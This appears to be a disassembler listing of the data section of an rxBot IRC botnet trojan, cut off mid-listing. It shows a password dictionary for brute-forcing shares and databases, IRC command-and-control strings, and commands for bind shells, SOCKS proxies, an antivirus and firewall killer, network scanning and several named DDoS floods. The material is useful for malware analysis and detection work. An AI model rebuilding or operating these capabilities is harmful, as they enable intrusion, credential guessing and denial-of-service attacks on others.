aDomainpass db 'domainpass',0 ; DATA XREF: .data:00440404�o
align 10h
aDomainpassword db 'domainpassword',0 ; DATA XREF: .data:00440408�o
align 10h
aDatabase_0 db 'database',0 ; DATA XREF: .data:0044040C�o
align 4
aAccess db 'access',0 ; DATA XREF: .data:00440410�o
align 4
aDbpass db 'dbpass',0 ; DATA XREF: .data:00440414�o
align 4
aDbpassword db 'dbpassword',0 ; DATA XREF: .data:00440418�o
align 4
aDatabasepass db 'databasepass',0 ; DATA XREF: .data:0044041C�o
align 4
aData db 'data',0 ; DATA XREF: .data:00440420�o
align 10h
aDatabasepasswo db 'databasepassword',0 ; DATA XREF: .data:00440424�o
align 4
aDb1 db 'db1',0 ; DATA XREF: .data:00440428�o
aDb2_0 db 'db2',0 ; DATA XREF: .data:0044042C�o
aDb1234 db 'db1234',0 ; DATA XREF: .data:00440430�o
align 4
aSa db 'sa',0 ; DATA XREF: .data:00440434�o
align 4
aSql db 'sql',0 ; DATA XREF: .data:00440438�o
aSqlpassoainsta db 'sqlpassoainstall',0 ; DATA XREF: .data:0044043C�o
align 10h
aOrainstall db 'orainstall',0 ; DATA XREF: .data:00440440�o
align 4
aOracle_0 db 'oracle',0 ; DATA XREF: .data:00440444�o
align 4
aIbm db 'ibm',0 ; DATA XREF: .data:00440448�o
aCisco db 'cisco',0 ; DATA XREF: .data:0044044C�o
align 10h
aDell db 'dell',0 ; DATA XREF: .data:00440450�o
align 4
aCompaq db 'compaq',0 ; DATA XREF: .data:00440454�o
align 10h
aSiemens db 'siemens',0 ; DATA XREF: .data:00440458�o
aHp db 'hp',0 ; DATA XREF: .data:0044045C�o
align 4
aNokia db 'nokia',0 ; DATA XREF: .data:00440460�o
align 4
aXp_1 db 'xp',0 ; DATA XREF: .data:00440464�o
align 4
aControl db 'control',0 ; DATA XREF: .data:00440468�o
aOffice db 'office',0 ; DATA XREF: .data:0044046C�o
align 4
aBlank db 'blank',0 ; DATA XREF: .data:00440470�o
align 10h
aWinpass db 'winpass',0 ; DATA XREF: .data:00440474�o
aMain db 'main',0 ; DATA XREF: .data:00440478�o
align 10h
aLan db 'lan',0 ; DATA XREF: .data:0044047C�o
aInternet_0 db 'internet',0 ; DATA XREF: .data:00440480�o
align 10h
aIntranet db 'intranet',0 ; DATA XREF: .data:00440484�o
align 4
aStudent_0 db 'student',0 ; DATA XREF: .data:00440488�o
aTeacher_0 db 'teacher',0 ; DATA XREF: .data:0044048C�o
aStaff_0 db 'staff',0 ; DATA XREF: .data:00440490�o
align 4
; char aSS[]
aSS db '%s%s',0 ; DATA XREF: WinMain(x,x,x,x)+10D�o
align 4
; char Format[]
Format db '%s\%s',0 ; DATA XREF: WinMain(x,x,x,x)+189�o
align 4
; char aSDS[]
aSDS db '%s %d "%s"',0 ; DATA XREF: WinMain(x,x,x,x)+28F�o
align 10h
; char asc_440A60[]
asc_440A60 db '-' ; DATA XREF: WinMain(x,x,x,x)+364�o
db 3, 34h, 2
dd 6E69616Dh, 202D0203h, 20746F42h, 72617473h, 2E646574h
dd 0
; char asc_440A7C[]
asc_440A7C db '-' ; DATA XREF: WinMain(x,x,x,x)+3A2�o
db 3, 34h, 2
db 70h ; p
db 72h, 6Fh, 63h
db 73h ; s
db 3, 2, 2Dh
aAvFwKillerActi db ' AV/FW Killer active.',0
align 10h
; char asc_440AA0[]
asc_440AA0 db '-' ; DATA XREF: WinMain(x,x,x,x)+3F3�o
db 3, 34h, 2
db 70h ; p
db 72h, 6Fh, 63h
db 73h ; s
db 3, 2, 2Dh
aFailedToStartA db ' Failed to start AV/FW killer thread, error: <%d>.',0
align 10h
; char asc_440AE0[]
asc_440AE0 db '-' ; DATA XREF: WinMain(x,x,x,x)+420�o
db 3, 34h, 2
dd 6E656469h, 2036474h
aServerRunningO db '- Server running on Port: 113.',0
align 4
; char asc_440B0C[]
asc_440B0C db '-' ; DATA XREF: WinMain(x,x,x,x)+46B�o
db 3, 34h, 2
dd 6E656469h, 2036474h
aFailedToStartS db '- Failed to start server, error: <%d>.',0
align 10h
; char asc_440B40[]
asc_440B40 db '-' ; DATA XREF: sub_4019E7+F2�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aConnectedToS_ db 'Connected to %s.',0
align 10h
; char aPassS[]
aPassS db 'PASS %s',0Dh,0Ah,0 ; DATA XREF: sub_401B4F+35�o
align 4
; char aNickSUserS00S[]
aNickSUserS00S db 'NICK %s',0Dh,0Ah ; DATA XREF: sub_401B4F+62�o
db 'USER %s 0 0 :%s',0Dh,0Ah,0
align 4
; char SubStr[]
SubStr db ' :',0 ; DATA XREF: sub_401CC7+86�o
align 4
; char Delim[]
Delim: ; DATA XREF: sub_401CC7+AE�o
unicode 0, < >,0
; char asc_440B90[]
asc_440B90: ; DATA XREF: sub_401CC7:loc_401D92�o
unicode 0, < >,0
; char asc_440B94[]
asc_440B94: ; DATA XREF: sub_401CC7+191�o
unicode 0, <!>,0
; char aPing[]
aPing db 'PING',0 ; DATA XREF: sub_401CC7+1A0�o
align 10h
; char aPongS[]
aPongS db 'PONG %s',0Dh,0Ah,0 ; DATA XREF: sub_401CC7+1BA�o
align 4
; char aJoinSS[]
aJoinSS db 'JOIN %s %s',0Dh,0Ah,0 ; DATA XREF: sub_401CC7+1DB�o
align 4
; char a001[]
a001 db '001',0 ; DATA XREF: sub_401CC7+1F7�o
; char a005[]
a005 db '005',0 ; DATA XREF: sub_401CC7+20C�o
; char aUserhostS[]
aUserhostS db 'USERHOST %s',0Dh,0Ah,0 ; DATA XREF: sub_401CC7+8016�o
align 4
; char aModeSS_0[]
aModeSS_0 db 'MODE %s %s',0Dh,0Ah,0 ; DATA XREF: sub_401CC7+802E�o
align 4
; char aJoinSS_4[]
aJoinSS_4 db 'JOIN %s %s',0Dh,0Ah,0 ; DATA XREF: sub_401CC7+8044�o
align 4
; char a302_0[]
a302_0 db '302',0 ; DATA XREF: sub_401CC7+221�o
; char a[]
a@: ; DATA XREF: sub_401CC7+231�o
unicode 0, <@>,0
; char a433_0[]
a433_0 db '433',0 ; DATA XREF: sub_401CC7+259�o
; char aNickS[]
aNickS db 'NICK %s',0Dh,0Ah,0 ; DATA XREF: sub_401CC7+284�o
align 4
; char aKick[]
aKick db 'KICK',0 ; DATA XREF: sub_401CC7+2DB�o
align 4
; char asc_440C14[]
asc_440C14 db '-' ; DATA XREF: sub_401CC7+34C�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aUserSLoggedOut db 'User %s logged out.',0
; char aNoticeSS[]
aNoticeSS db 'NOTICE %s :%s',0Dh,0Ah,0 ; DATA XREF: sub_401CC7+368�o
; char aJoinSS_0[]
aJoinSS_0 db 'JOIN %s %s',0Dh,0Ah,0 ; DATA XREF: sub_401CC7+3B2�o
align 4
; char aNick[]
aNick db 'NICK',0 ; DATA XREF: sub_401CC7+3C5�o
align 4
; char aSS_1[]
aSS_1 db ':%s%s',0 ; DATA XREF: sub_401CC7+4E3�o
align 4
; char aPart[]
aPart db 'PART',0 ; DATA XREF: sub_401CC7+508�o
align 4
; char aQuit[]
aQuit db 'QUIT',0 ; DATA XREF: sub_401CC7+519�o
align 4
; char asc_440C74[]
asc_440C74 db '-' ; DATA XREF: sub_401CC7+5A8�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aUserSLoggedO_0 db 'User: %s logged out.',0
align 4
; char aPart_0[]
aPart_0 db 'PART',0 ; DATA XREF: sub_401CC7+5C5�o
align 10h
aNoticeSS_0 db 'NOTICE %s :%s',0Dh,0Ah,0 ; DATA XREF: sub_401CC7+5E9�o
; char a353[]
a353 db '353',0 ; DATA XREF: sub_401CC7+557�o
unk_440CB4 db 2Dh ; - ; DATA XREF: sub_401CC7+588�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aJoinedChannelS db 'Joined channel: %s.',0
; char aPrivmsg[]
aPrivmsg db 'PRIVMSG',0 ; DATA XREF: sub_401CC7+5F4�o
; char aNotice[]
aNotice db 'NOTICE',0 ; DATA XREF: sub_401CC7+605�o
align 4
; char a332[]
a332 db '332',0 ; DATA XREF: sub_401CC7+616�o
; char aPrivmsg_0[]
aPrivmsg_0 db 'PRIVMSG',0 ; DATA XREF: sub_401CC7+637�o
; char aNotice_0[]
aNotice_0 db 'NOTICE',0 ; DATA XREF: sub_401CC7+64C�o
align 4
; char aNotice_1[]
aNotice_1 db 'NOTICE',0 ; DATA XREF: sub_401CC7+7C7�o
align 10h
; char asc_440D00[]
asc_440D00: ; DATA XREF: sub_401CC7+7EC�o
unicode 0, <#>,0
; char dword_440D04
dword_440D04 dd 52455601h, 4E4F4953h, 1 ; DATA XREF: sub_401CC7+874�o
dword_440D10 dd 49544F4Eh, 25204543h, 13A2073h, 53524556h, 204E4F49h
; DATA XREF: sub_401CC7+89F�o
dd 0D017325h, 0Ah
; char dword_440D2C
dword_440D2C dd 4E495001h, 47h ; DATA XREF: sub_401CC7+8AA�o
dword_440D34 dd 49544F4Eh, 25204543h, 13A2073h, 474E4950h, 1732520h
; DATA XREF: sub_401CC7+8DB�o
dd 0A0Dh
; char dword_440D4C
dword_440D4C dd 43434401h, 0 ; DATA XREF: sub_401CC7+693�o
; char aSend[]
aSend db 'SEND',0 ; DATA XREF: sub_401CC7+6B1�o
align 4
; char aS[]
aS db '%s',0 ; DATA XREF: sub_401CC7+6DE�o
align 10h
; char aS_0[]
aS_0 db '%s',0 ; DATA XREF: sub_401CC7+6F9�o
align 4
; char asc_440D64[]
asc_440D64 db '-' ; DATA XREF: sub_401CC7+75A�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aReceiveFileSFr db '- Receive file: ',27h,'%s',27h,' from user: %s.',0
align 4
unk_440D94 db 2Dh ; - ; DATA XREF: sub_401CC7+8EC�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aFailedToStartT db '- Failed to start transfer thread, error: <%d>.',0
align 10h
; char asc_440DD0[]
asc_440DD0 db '-' ; DATA XREF: sub_401CC7+904�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aReceiveFileSFa db '- Receive file: ',27h,'%s',27h,' failed from unauthorized user: %s.',0
align 4
; char aChat[]
aChat db 'CHAT',0 ; DATA XREF: sub_401CC7+924�o
align 4
; char aS_1[]
aS_1 db '%s',0 ; DATA XREF: sub_401CC7+961�o
align 10h
; char asc_440E20[]
asc_440E20 db '-' ; DATA XREF: sub_401CC7+9BB�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aChatFromUserS_ db '- Chat from user: %s.',0
align 10h
unk_440E40 db 2Dh ; - ; DATA XREF: sub_401CC7+A2A�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aFailedToStartC db '- Failed to start chat thread, error: <%d>.',0
align 4
unk_440E78 db 2Dh ; - ; DATA XREF: sub_401CC7+A3B�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aChatAlreadyAct db '- Chat already active with user: %s.',0
align 4
unk_440EA8 db 2Dh ; - ; DATA XREF: sub_401CC7+A4C�o
db 3, 34h, 2
db 64h ; d
db 2 dup(63h), 2
db 3
aChatFailedByUn db '- Chat failed by unauthorized user: %s.',0
align 4
; char aLogin[]
aLogin db 'login',0 ; DATA XREF: sub_401CC7+A6F�o
align 4
; char asc_440EE4[]
asc_440EE4: ; DATA XREF: sub_401CC7+A87�o
unicode 0, <l>,0
; char asc_440EE8[]
asc_440EE8: ; DATA XREF: sub_401CC7+7EA6�o
unicode 0, <!>,0
; char asc_440EEC[]
asc_440EEC: ; DATA XREF: sub_401CC7+7EC4�o
unicode 0, <~>,0
; char aNoticeSPassAut[]
aNoticeSPassAut db 'NOTICE %s :Pass auth failed (%s!%s).',0Dh,0Ah,0
; DATA XREF: sub_401CC7+7EF4�o
align 4
; char aNoticeSYourAtt[]
aNoticeSYourAtt db 'NOTICE %s :Your attempt has been logged.',0Dh,0Ah,0
; DATA XREF: sub_401CC7+7F0B�o
align 4
unk_440F44 db 2Dh ; - ; DATA XREF: sub_401CC7+7F1D�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aFailedPassAuth db '*Failed pass auth by: (%s!%s).',0
align 10h
; char aNoticeSHostAut[]
aNoticeSHostAut db 'NOTICE %s :Host Auth failed (%s!%s).',0Dh,0Ah,0
; DATA XREF: sub_401CC7+7F5B�o
align 4
; char aNoticeSYourA_0[]
aNoticeSYourA_0 db 'NOTICE %s :Your attempt has been logged.',0Dh,0Ah,0
; DATA XREF: sub_401CC7+7F72�o
align 4
unk_440FC4 db 2Dh ; - ; DATA XREF: sub_401CC7+7F84�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aFailedHostAuth db '*Failed host auth by: (%s!%s).',0
align 10h
unk_440FF0 db 2Dh ; - ; DATA XREF: sub_401CC7+7FE5�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aPasswordAccept db 'Password accepted.',0
align 10h
; char asc_441010[]
asc_441010 db '-' ; DATA XREF: sub_401CC7+8002�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aUserSLoggedIn_ db 'User: %s logged in.',0
; char a332_3[]
a332_3 db '332',0 ; DATA XREF: sub_401CC7+AA9�o
; char asc_441034[]
asc_441034 db ' :',0 ; DATA XREF: sub_401CC7:loc_4027C8�o
align 4
; char aD[]
aD db '$%d-',0 ; DATA XREF: sub_401CC7+B5F�o
align 10h
; char aD_0[]
aD_0 db '$%d',0 ; DATA XREF: sub_401CC7+C23�o
; char aMe[]
aMe db '$me',0 ; DATA XREF: sub_401CC7+C95�o
; char aUser[]
aUser db '$user',0 ; DATA XREF: sub_401CC7+CA7�o
align 10h
; char aChan[]
aChan db '$chan',0 ; DATA XREF: sub_401CC7+CB8�o
align 4
; char aRndnick[]
aRndnick db '$rndnick',0 ; DATA XREF: sub_401CC7+CD4�o
align 4
; char aServer[]
aServer db '$server',0 ; DATA XREF: sub_401CC7+CE5�o
; char aChr[]
aChr db '$chr(',0 ; DATA XREF: sub_401CC7+CF0�o
align 4
; char aChr_0[]
aChr_0 db '$chr(',0 ; DATA XREF: sub_401CC7+D09�o
align 4
; char asc_44107C[]
asc_44107C: ; DATA XREF: sub_401CC7+D31�o
unicode 0, <)>,0
; char a63[]
a63 db '63',0 ; DATA XREF: sub_401CC7+D59�o
align 4
; char asc_441084[]
asc_441084: ; DATA XREF: sub_401CC7+E31�o
unicode 0, < >,0
; char asc_441088[]
asc_441088: ; DATA XREF: sub_401CC7:loc_402B19�o
unicode 0, < >,0
; char aRndnick_0[]
aRndnick_0 db 'rndnick',0 ; DATA XREF: sub_401CC7+E8C�o
; char aRn[]
aRn db 'rn',0 ; DATA XREF: sub_401CC7+EA4�o
align 4
; char aNickS_8[]
aNickS_8 db 'NICK %s',0Dh,0Ah,0 ; DATA XREF: sub_401CC7+7E5D�o
align 4
; char asc_4410A4[]
asc_4410A4 db '-' ; DATA XREF: sub_401CC7+7E74�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aRandomNickChan db 'Random nick change: %s',0
align 4
; char aDie[]
aDie db 'die',0 ; DATA XREF: sub_401CC7+EB9�o
; char aD_1[]
aD_1 db 'd',0 ; DATA XREF: sub_401CC7+ECE�o
align 10h
; char a332_4[]
a332_4 db '332',0 ; DATA XREF: sub_401CC7+2F3E�o
; char aLogout[]
aLogout db 'logout',0 ; DATA XREF: sub_401CC7+EE3�o
align 4
; char aLo[]
aLo db 'lo',0 ; DATA XREF: sub_401CC7+EF8�o
align 10h
; char asc_4410E0[]
asc_4410E0 db '-' ; DATA XREF: sub_401CC7+2EC5�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aUserSLoggedO_1 db 'User %s logged out.',0
unk_441100 db 2Dh ; - ; DATA XREF: sub_401CC7+2EDB�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aNoUserLoggedIn db 'No user logged in at slot: %d.',0
align 4
unk_44112C db 2Dh ; - ; DATA XREF: sub_401CC7+2EE3�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aInvalidLoginSl db 'Invalid login slot number: %d.',0
align 4
; char asc_441158[]
asc_441158 db '-' ; DATA XREF: sub_401CC7+2F22�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aUserSLoggedO_2 db 'User %s logged out.',0
; char aVersion[]
aVersion db 'version',0 ; DATA XREF: sub_401CC7+F0D�o
; char aVer[]
aVer db 'ver',0 ; DATA XREF: sub_401CC7+F22�o
dword_441184 dd 234032Dh, 6E69616Dh, 202D0302h, 7325h ; DATA XREF: sub_401CC7+2E86�o
; char aDedication[]
aDedication db 'dedication',0 ; DATA XREF: sub_401CC7+F37�o
align 10h
; char aDed[]
aDed db 'ded',0 ; DATA XREF: sub_401CC7+F4C�o
unk_4411A4 db 2Dh ; - ; DATA XREF: sub_401CC7:loc_404B3E�o
db 3, 34h, 2
db 6Dh ; m
db 61h, 69h, 6Eh
db 2
db 3, 2Dh, 20h
aThisModOfRxbot db 'This mod of rxBot is dedicated to Pia Gerhardt (nameless@efnet/ir'
db 'cnet), the Beautiful Operatress from Heaven (or Bitch Operatress '
db 'from Hell?) who I love so much.',0
align 4
; char aSpeedtest[]
aSpeedtest db 'speedtest',0 ; DATA XREF: sub_401CC7+F61�o
align 10h
; char aSt[]
aSt db 'st',0 ; DATA XREF: sub_401CC7+F76�o
align 4
; char aSecure[]
aSecure db 'secure',0 ; DATA XREF: sub_401CC7+F8B�o
align 4
; char aSec[]
aSec db 'sec',0 ; DATA XREF: sub_401CC7+FA0�o
; char aUnsecure[]
aUnsecure db 'unsecure',0 ; DATA XREF: sub_401CC7+FB5�o
align 4
; char aUnsec[]
aUnsec db 'unsec',0 ; DATA XREF: sub_401CC7+FCA�o
align 4
; char aSecure_1[]
aSecure_1 db 'secure',0 ; DATA XREF: sub_401CC7+2D61�o
align 4
; char aSec_0[]
aSec_0 db 'sec',0 ; DATA XREF: sub_401CC7+2D72�o
aSecuring db 'Securing',0 ; DATA XREF: sub_401CC7+2DCD�o
align 4
aUnsecuring db 'Unsecuring',0 ; DATA XREF: sub_401CC7+2DD4�o
align 4
; char asc_4412A8[]
asc_4412A8 db '-' ; DATA XREF: sub_401CC7+2DDA�o
db 3, 34h, 2
dd 75636573h, 3026572h, 7325202Dh, 73797320h, 2E6D6574h
dd 0
dword_4412C4 dd 234032Dh, 75636573h, 3026572h ; DATA XREF: sub_401CC7+2E54�o
aFailedToStar_0 db '- Failed to start secure thread, error: <%d>.',0
align 10h
; char aBindshell[]
aBindshell db 'bindshell',0 ; DATA XREF: sub_401CC7+FDF�o
align 4
; char aBd[]
aBd db 'bd',0 ; DATA XREF: sub_401CC7+FF4�o
align 10h
; char asc_441310[]
asc_441310 db '-' ; DATA XREF: sub_401CC7+2CD2�o
db 3, 34h, 2
db 62h ; b
db 69h, 6Eh, 64h
db 73h ; s
db 68h, 65h, 6Ch
db 6Ch ; l
db 2, 3, 2Dh
aServerStartedO db ' Server started on: %s:%d.',0
align 4
unk_44133C db 2Dh ; - ; DATA XREF: sub_401CC7+2D56�o
db 3, 34h, 2
db 62h ; b
db 69h, 6Eh, 64h
db 73h ; s
db 68h, 65h, 6Ch
db 6Ch ; l
db 2, 3, 2Dh
aFailedToStar_1 db ' Failed to start server thread, error: <%d>.',0
align 4
; char aBindshellstop[]
aBindshellstop db 'bindshellstop',0 ; DATA XREF: sub_401CC7+1009�o
align 4
aServer_0 db 'Server',0 ; DATA XREF: sub_401CC7+1022�o
align 4
dword_441394 dd 234032Dh, 646E6962h, 6C656873h, 2D03026Ch, 0
; DATA XREF: sub_401CC7+1027�o
; char aSocks4[]
aSocks4 db 'socks4',0 ; DATA XREF: sub_401CC7+1032�o
align 10h
; char aS4[]
aS4 db 's4',0 ; DATA XREF: sub_401CC7+1047�o
align 4
; char asc_4413B4[]
asc_4413B4 db '-' ; DATA XREF: sub_401CC7+2BE1�o
db 3, 34h, 2
dd 6B636F73h, 3023473h
aServerStarte_0 db '- Server started on: %s:%d.',0
dword_4413DC dd 234032Dh, 6B636F73h, 3023473h ; DATA XREF: sub_401CC7+2C50�o
aFailedToStar_2 db '- Failed to start server thread, error: <%d>.',0
align 4
; char aSocks4stop[]
aSocks4stop db 'socks4stop',0 ; DATA XREF: sub_401CC7+105C�o
align 4
aServer_1 db 'Server',0 ; DATA XREF: sub_401CC7+1075�o
align 4
dword_44142C dd 234032Dh, 6B636F73h, 3023473h, 2Dh ; DATA XREF: sub_401CC7+107A�o
; char aRloginstop[]
aRloginstop db 'rloginstop',0 ; DATA XREF: sub_401CC7+1085�o
align 4
aServer_2 db 'Server',0 ; DATA XREF: sub_401CC7+109E�o
align 10h
dword_441450 dd 234032Dh, 676F6C72h, 2646E69h, 2D03h ; DATA XREF: sub_401CC7+10A3�o
; char aHttpstop[]
aHttpstop db 'httpstop',0 ; DATA XREF: sub_401CC7+10AE�o
align 4
aServer_3 db 'Server',0 ; DATA XREF: sub_401CC7+10C7�o
align 4
dword_441474 dd 234032Dh, 70747468h, 2D030264h, 0 ; DATA XREF: sub_401CC7+10CC�o
; char aLogstop[]
aLogstop db 'logstop',0 ; DATA XREF: sub_401CC7+10D7�o
aLogList db 'Log list',0 ; DATA XREF: sub_401CC7+10F0�o
align 4
dword_441498 dd 234032Dh, 2676F6Ch, 2D03h ; DATA XREF: sub_401CC7+10F5�o
; char aRedirectstop[]
aRedirectstop db 'redirectstop',0 ; DATA XREF: sub_401CC7+1100�o
align 4
aTcpRedirect db 'TCP redirect',0 ; DATA XREF: sub_401CC7+1119�o
align 4
dword_4414C4 dd 234032Dh, 69646572h, 74636572h, 2D0302h ; DATA XREF: sub_401CC7+111E�o
; char aDdos_stop[]
aDdos_stop db 'ddos.stop',0 ; DATA XREF: sub_401CC7+1129�o
align 10h
aDdosFlood db 'DDoS flood',0 ; DATA XREF: sub_401CC7+1142�o
align 4
dword_4414EC dd 234032Dh, 736F6464h, 2D0302h ; DATA XREF: sub_401CC7+1147�o
; char aSynstop[]
aSynstop db 'synstop',0 ; DATA XREF: sub_401CC7+1152�o
aSynFlood db 'Syn flood',0 ; DATA XREF: sub_401CC7+116B�o
align 4
dword_44150C dd 234032Dh, 26E7973h, 2D03h ; DATA XREF: sub_401CC7+1170�o
; char aSkysynstop[]
aSkysynstop db 'skysynstop',0 ; DATA XREF: sub_401CC7+117B�o
align 4
aSkysynFlood db 'SkySyn flood',0 ; DATA XREF: sub_401CC7+1194�o
align 4
dword_441534 dd 234032Dh, 73796B73h, 3026E79h, 2Dh ; DATA XREF: sub_401CC7+1199�o
; char aTarga3stop[]
aTarga3stop db 'targa3stop',0 ; DATA XREF: sub_401CC7+11A4�o
align 10h
aTarga3Flood db 'Targa3 flood',0 ; DATA XREF: sub_401CC7+11BD�o
align 10h
dword_441560 dd 234032Dh, 67726174h, 3023361h, 2Dh ; DATA XREF: sub_401CC7+11C2�o
; char aWonkstop[]
aWonkstop db 'wonkstop',0 ; DATA XREF: sub_401CC7+11CD�o
align 4
aWonkFlood db 'Wonk flood',0 ; DATA XREF: sub_401CC7+11E6�o
align 4
dword_441588 dd 234032Dh, 6B6E6F77h, 2D0302h ; DATA XREF: sub_401CC7+11EB�o
; char aPacketstop[]
aPacketstop db 'packetstop',0 ; DATA XREF: sub_401CC7+11F6�o
align 10h
aDdosFlood_0 db 'DDoS flood',0 ; DATA XREF: sub_401CC7+1217�o
align 4
dword_4415AC dd 234032Dh, 736F6464h, 2D0302h ; DATA XREF: sub_401CC7+121C�o
aSynFlood_0 db 'Syn flood',0 ; DATA XREF: sub_401CC7+1235�o
align 4
dword_4415C4 dd 234032Dh, 26E7973h, 2D03h ; DATA XREF: sub_401CC7+123A�o
aUdpFlood db 'UDP flood',0 ; DATA XREF: sub_401CC7+1256�o
align 4
dword_4415DC dd 234032Dh, 2706475h, 2D03h ; DATA XREF: sub_401CC7+125B�o
aPingFlood db 'Ping flood',0 ; DATA XREF: sub_401CC7+1274�o
align 4
dword_4415F4 dd 234032Dh, 676E6970h, 2D0302h ; DATA XREF: sub_401CC7+1279�o
aTarga3Flood_0 db 'Targa3 flood',0 ; DATA XREF: sub_401CC7+1295�o
align 10h
dword_441610 dd 234032Dh, 67726174h, 3023361h, 2Dh ; DATA XREF: sub_401CC7+129A�o
aWonkFlood_0 db 'Wonk flood',0 ; DATA XREF: sub_401CC7+12B3�o
align 4
dword_44162C dd 234032Dh, 6B6E6F77h, 2D0302h ; DATA XREF: sub_401CC7+12B8�o
aTsunamiFlood db 'Tsunami flood',0 ; DATA XREF: sub_401CC7+12D4�o
align 4
dword_441648 dd 234032Dh, 6E757374h, 2696D61h, 2D03h ; DATA XREF: sub_401CC7+12D9�o
aWisdomAttack db 'Wisdom attack',0 ; DATA XREF: sub_401CC7+12F2�o
align 4
dword_441668 dd 234032Dh, 64736977h, 3026D6Fh, 2Dh ; DATA XREF: sub_401CC7+12F7�o
aSkysynFlood_0 db 'SkySyn flood',0 ; DATA XREF: sub_401CC7+1313�o
align 4
dword_441688 dd 234032Dh, 73796B73h, 3026E79h, 2Dh ; DATA XREF: sub_401CC7+1318�o
unk_441698 db 2Dh ; - ; DATA XREF: sub_401CC7+1332�o
db 3, 34h, 2
db 64h ; d
db 64h, 6Fh, 73h
db 2
db 3, 2Dh, 20h
aAllPacketingAc db 'All packeting activity has been halted.',0
; char aTsunamistop[]
aTsunamistop db 'tsunamistop',0 ; DATA XREF: sub_401CC7+134C�o
aTsunamiFlood_0 db 'Tsunami flood',0 ; DATA XREF: sub_401CC7+1365�o
align 4
dword_4416E8 dd 234032Dh, 6E757374h, 2696D61h, 2D03h ; DATA XREF: sub_401CC7+136A�o
; char aWisdomstop[]
aWisdomstop db 'wisdomstop',0 ; DATA XREF: sub_401CC7+1375�o
align 4
aWisdomAttack_0 db 'Wisdom attack',0 ; DATA XREF: sub_401CC7+138E�o
align 4
dword_441714 dd 234032Dh, 64736977h, 3026D6Fh, 2Dh ; DATA XREF: sub_401CC7+1393�o
; char aUdpstop[]
aUdpstop db 'udpstop',0 ; DATA XREF: sub_401CC7+139E�o
aUdpFlood_0 db 'UDP flood',0 ; DATA XREF: sub_401CC7+13B7�o
align 4
dword_441738 dd 234032Dh, 2706475h, 2D03h ; DATA XREF: sub_401CC7+13BC�o
; char aPingstop[]
aPingstop db 'pingstop',0 ; DATA XREF: sub_401CC7+13C7�o
align 10h
aPingFlood_0 db 'Ping flood',0 ; DATA XREF: sub_401CC7+13E0�o
align 4
dword_44175C dd 234032Dh, 676E6970h, 2D0302h ; DATA XREF: sub_401CC7+13E5�o
; char aTftpstop[]
aTftpstop db 'tftpstop',0 ; DATA XREF: sub_401CC7+13F0�o
align 4
aServer_4 db 'Server',0 ; DATA XREF: sub_401CC7+1409�o
align 4
dword_44177C dd 234032Dh, 70746674h, 2D030264h, 0 ; DATA XREF: sub_401CC7+140E�o
; char aFindfilestop[]
aFindfilestop db 'findfilestop',0 ; DATA XREF: sub_401CC7+1419�o
align 4
; char aFfstop[]
aFfstop db 'ffstop',0 ; DATA XREF: sub_401CC7+142E�o
align 4
aFindFile db 'Find file',0 ; DATA XREF: sub_401CC7+2B12�o
align 10h
dword_4417B0 dd 234032Dh, 646E6966h, 656C6966h, 2D0302h ; DATA XREF: sub_401CC7+2B17�o
; char aProcsstop[]
aProcsstop db 'procsstop',0 ; DATA XREF: sub_401CC7+1443�o
align 4
; char aPsstop[]
aPsstop db 'psstop',0 ; DATA XREF: sub_401CC7+1458�o
align 4
aProcessList db 'Process list',0 ; DATA XREF: sub_401CC7+2AFD�o
align 4
dword_4417E4 dd 234032Dh, 636F7270h, 2D030273h, 0 ; DATA XREF: sub_401CC7+2B02�o
; char aClonestop[]
aClonestop db 'clonestop',0 ; DATA XREF: sub_401CC7+146D�o
align 10h
aClone db 'Clone',0 ; DATA XREF: sub_401CC7+1486�o
align 4
dword_441808 dd 234032Dh, 6E6F6C63h, 3027365h, 2Dh ; DATA XREF: sub_401CC7+148B�o
; char aSecurestop[]
aSecurestop db 'securestop',0 ; DATA XREF: sub_401CC7+1496�o
align 4
aSecure_0 db 'Secure',0 ; DATA XREF: sub_401CC7+14AF�o
align 4
dword_44182C dd 234032Dh, 75636573h, 3026572h, 2Dh ; DATA XREF: sub_401CC7+14B4�o
; char aScanstop[]
aScanstop db 'scanstop',0 ; DATA XREF: sub_401CC7+14BF�o
align 4
aScan db 'Scan',0 ; DATA XREF: sub_401CC7+14D8�o
align 10h
dword_441850 dd 234032Dh, 6E616373h, 2D0302h ; DATA XREF: sub_401CC7+14DD�o
; char aScanstats[]
aScanstats db 'scanstats',0 ; DATA XREF: sub_401CC7+14E8�o
align 4
; char aStats[]
aStats db 'stats',0 ; DATA XREF: sub_401CC7+14FD�o
align 10h
; char aTransferstats[]
aTransferstats db 'transferstats',0 ; DATA XREF: sub_401CC7+1512�o
align 10h
; char aTrstats[]
aTrstats db 'trstats',0 ; DATA XREF: sub_401CC7+1527�o
; char aConnectbacksta[]
